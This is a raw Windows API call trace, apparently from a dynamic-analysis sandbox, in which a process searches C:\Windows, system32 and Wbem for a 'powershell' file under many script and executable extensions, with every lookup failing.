	[0356.639] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.640] SetErrorMode (uMode=0x1) returned 0x1
	[0356.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.640] SetErrorMode (uMode=0x1) returned 0x1
	[0356.640] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.640] SetErrorMode (uMode=0x1) returned 0x1
	[0356.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.641] SetErrorMode (uMode=0x1) returned 0x1
	[0356.641] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.641] SetErrorMode (uMode=0x1) returned 0x1
	[0356.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.641] SetErrorMode (uMode=0x1) returned 0x1
	[0356.641] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.641] SetErrorMode (uMode=0x1) returned 0x1
	[0356.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.642] SetErrorMode (uMode=0x1) returned 0x1
	[0356.642] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.642] SetErrorMode (uMode=0x1) returned 0x1
	[0356.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.642] SetErrorMode (uMode=0x1) returned 0x1
	[0356.642] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.643] SetErrorMode (uMode=0x1) returned 0x1
	[0356.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0356.643] SetErrorMode (uMode=0x1) returned 0x1
	[0356.643] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.643] SetErrorMode (uMode=0x1) returned 0x1
	[0356.643] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.643] SetErrorMode (uMode=0x1) returned 0x1
	[0356.644] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.644] SetErrorMode (uMode=0x1) returned 0x1
	[0356.644] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.644] SetErrorMode (uMode=0x1) returned 0x1
	[0356.644] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.644] SetErrorMode (uMode=0x1) returned 0x1
	[0356.645] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.645] SetErrorMode (uMode=0x1) returned 0x1
	[0356.645] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.645] SetErrorMode (uMode=0x1) returned 0x1
	[0356.645] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.645] SetErrorMode (uMode=0x1) returned 0x1
	[0356.645] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.646] SetErrorMode (uMode=0x1) returned 0x1
	[0356.646] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.646] SetErrorMode (uMode=0x1) returned 0x1
	[0356.646] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.646] SetErrorMode (uMode=0x1) returned 0x1
	[0356.646] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.647] SetErrorMode (uMode=0x1) returned 0x1
	[0356.647] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.647] SetErrorMode (uMode=0x1) returned 0x1
	[0356.647] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.647] SetErrorMode (uMode=0x1) returned 0x1
	[0356.647] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.647] SetErrorMode (uMode=0x1) returned 0x1
	[0356.648] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.648] SetErrorMode (uMode=0x1) returned 0x1
	[0356.648] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.648] SetErrorMode (uMode=0x1) returned 0x1
	[0356.648] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.648] SetErrorMode (uMode=0x1) returned 0x1
	[0356.648] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.649] SetErrorMode (uMode=0x1) returned 0x1
	[0356.649] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.649] SetErrorMode (uMode=0x1) returned 0x1
	[0356.649] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.649] SetErrorMode (uMode=0x1) returned 0x1
	[0356.650] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.650] SetErrorMode (uMode=0x1) returned 0x1
	[0356.650] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.792] SetErrorMode (uMode=0x1) returned 0x1
	[0356.792] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.792] SetErrorMode (uMode=0x1) returned 0x1
	[0356.792] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.792] SetErrorMode (uMode=0x1) returned 0x1
	[0356.792] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.793] SetErrorMode (uMode=0x1) returned 0x1
	[0356.793] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.793] SetErrorMode (uMode=0x1) returned 0x1
	[0356.793] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.793] SetErrorMode (uMode=0x1) returned 0x1
	[0356.793] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.793] SetErrorMode (uMode=0x1) returned 0x1
	[0356.794] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0356.794] SetErrorMode (uMode=0x1) returned 0x1
	[0356.794] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.794] SetErrorMode (uMode=0x1) returned 0x1
	[0356.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.794] SetErrorMode (uMode=0x1) returned 0x1
	[0356.794] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.795] SetErrorMode (uMode=0x1) returned 0x1
	[0356.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.795] SetErrorMode (uMode=0x1) returned 0x1
	[0356.795] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.795] SetErrorMode (uMode=0x1) returned 0x1
	[0356.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.796] SetErrorMode (uMode=0x1) returned 0x1
	[0356.796] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.796] SetErrorMode (uMode=0x1) returned 0x1
	[0356.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.796] SetErrorMode (uMode=0x1) returned 0x1
	[0356.796] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.796] SetErrorMode (uMode=0x1) returned 0x1
	[0356.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.797] SetErrorMode (uMode=0x1) returned 0x1
	[0356.797] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.797] SetErrorMode (uMode=0x1) returned 0x1
	[0356.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.797] SetErrorMode (uMode=0x1) returned 0x1
	[0356.797] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.798] SetErrorMode (uMode=0x1) returned 0x1
	[0356.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.798] SetErrorMode (uMode=0x1) returned 0x1
	[0356.798] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.798] SetErrorMode (uMode=0x1) returned 0x1
	[0356.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.798] SetErrorMode (uMode=0x1) returned 0x1
	[0356.799] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.799] SetErrorMode (uMode=0x1) returned 0x1
	[0356.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.799] SetErrorMode (uMode=0x1) returned 0x1
	[0356.799] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c79db60 | out: lpFindFileData=0x1c79db60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.799] SetErrorMode (uMode=0x1) returned 0x1
	[0356.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c79d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.800] SetErrorMode (uMode=0x1) returned 0x1
